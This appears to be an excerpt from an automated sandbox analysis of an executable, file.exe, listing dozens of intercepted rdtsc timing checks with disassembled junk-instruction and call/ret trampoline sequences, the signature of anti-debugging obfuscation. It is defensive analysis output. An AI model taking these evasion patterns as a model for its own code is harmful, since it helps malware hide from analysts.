Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4A638 second address: D4A650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007F6969412EA6h 0x00000011 jng 00007F6969412EA6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4ABDA second address: D4ABE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4ABE1 second address: D4ABEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4ABEE second address: D4ABF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4ABF2 second address: D4AC37 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6969412EA8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jp 00007F6969412EACh 0x0000002c mov esi, dword ptr [ebp+122D3C94h] 0x00000032 push eax 0x00000033 pushad 0x00000034 jo 00007F6969412EACh 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4AC37 second address: D4AC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F6968D54745h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B058 second address: D4B05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B151 second address: D4B16D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B16D second address: D4B18E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6969412EB5h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B220 second address: D4B225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B765 second address: D4B76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B76A second address: D4B770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B770 second address: D4B774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B774 second address: D4B7B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and edi, dword ptr [ebp+122D2ECBh] 0x0000000f call 00007F6968D5473Ch 0x00000014 add dword ptr [ebp+122D1E21h], edx 0x0000001a pop esi 0x0000001b push 00000000h 0x0000001d mov edi, dword ptr [ebp+122D2C93h] 0x00000023 sub dword ptr [ebp+122D3845h], eax 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D3D45h], ebx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 pop eax 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B7B3 second address: D4B7B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C1BF second address: D4C1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BFAF second address: D4BFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6969412EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4DC34 second address: D4DC90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6968D54738h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 xor edi, dword ptr [ebp+122D30FEh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F6968D54738h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D2433h] 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d pushad 0x0000003e jmp 00007F6968D54747h 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C94B second address: D4C95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6969412EA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F6969412EA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C95E second address: D4C962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F075 second address: D4F0A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c cld 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F6969412EA8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F0A9 second address: D4F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F0AD second address: D4F0B7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F0B7 second address: D4F0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4FA6F second address: D4FA73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F833 second address: D4F83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4FA73 second address: D4FA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F6969412EA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F83B second address: D4F841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53563 second address: D53567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54B1E second address: D54BD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c ja 00007F6968D54736h 0x00000012 pop ebx 0x00000013 jmp 00007F6968D5473Bh 0x00000018 popad 0x00000019 nop 0x0000001a add bx, 8901h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F6968D54738h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D2441h], ecx 0x00000041 mov dword ptr [ebp+122D32B2h], esi 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007F6968D54738h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 0000001Ah 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 jmp 00007F6968D5473Fh 0x00000068 jmp 00007F6968D54749h 0x0000006d push eax 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jns 00007F6968D54736h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C58 second address: D57C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59C75 second address: D59C82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59C82 second address: D59C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59C86 second address: D59D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F6968D54738h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 movzx edi, ax 0x00000025 jmp 00007F6968D5473Bh 0x0000002a push 00000000h 0x0000002c mov ebx, 6BA15991h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F6968D54738h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d jmp 00007F6968D54749h 0x00000052 xchg eax, esi 0x00000053 jmp 00007F6968D54744h 0x00000058 push eax 0x00000059 pushad 0x0000005a push ebx 0x0000005b pushad 0x0000005c popad 0x0000005d pop ebx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53CE7 second address: D53CF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F6969412EA8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56DD0 second address: D56DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D5473Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56DE0 second address: D56DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5BCB0 second address: D5BCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5BD65 second address: D5BD7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jnc 00007F6969412EA8h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58F24 second address: D58F2E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6968D5473Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58F2E second address: D58F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F6969412EB0h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5DD05 second address: D5DD1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D54745h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5ECF9 second address: D5ED89 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6969412EB4h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jg 00007F6969412EBCh 0x00000012 nop 0x00000013 mov di, DC2Dh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F6969412EA8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 push eax 0x00000034 mov bx, 857Ah 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F6969412EA8h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jo 00007F6969412EA8h 0x0000005e push edi 0x0000005f pop edi 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5FC1F second address: D5FC23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D60C7E second address: D60C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D60C87 second address: D60C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D60C8D second address: D60C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F6969412EA6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D60C9E second address: D60CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5FD39 second address: D5FD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5FD3D second address: D5FD51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54740h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5FD51 second address: D5FD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5FD61 second address: D5FD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61FEC second address: D62003 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D620FB second address: D62101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6AD33 second address: D6AD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6A462 second address: D6A467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6A5FB second address: D6A601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6A601 second address: D6A605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E8CE second address: D6E8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D757AB second address: D757AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D757AF second address: D757B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74516 second address: D7451A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7451A second address: D7451E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7451E second address: D7452A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6968D54736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFCA36 second address: CFCA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F6969412EB5h 0x0000000c pop esi 0x0000000d push edx 0x0000000e ja 00007F6969412EA6h 0x00000014 pop edx 0x00000015 popad 0x00000016 jo 00007F6969412EC1h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74C57 second address: D74C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74C5D second address: D74C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74C61 second address: D74C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74C69 second address: D74C6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75056 second address: D7505A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7505A second address: D7507D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F6969412EA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6969412EAFh 0x00000013 jno 00007F6969412EA6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7507D second address: D7508F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6968D54736h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7508F second address: D75095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75095 second address: D750B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6968D54736h 0x00000008 jmp 00007F6968D54745h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D750B4 second address: D750C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D750C8 second address: D750CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D750CC second address: D750D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D754E8 second address: D754FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6968D5473Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F6968D54736h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D089B9 second address: D089BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D089BF second address: D089F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F6968D54754h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnp 00007F6968D54736h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jp 00007F6968D54736h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E3EC second address: D7E3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E3F2 second address: D7E3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E3F8 second address: D7E3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E6A9 second address: D7E6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E6B2 second address: D7E6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E6B6 second address: D7E6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E826 second address: D7E82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E82A second address: D7E836 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6968D54736h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E836 second address: D7E85A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6969412EA8h 0x00000008 pushad 0x00000009 jmp 00007F6969412EB1h 0x0000000e ja 00007F6969412EA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
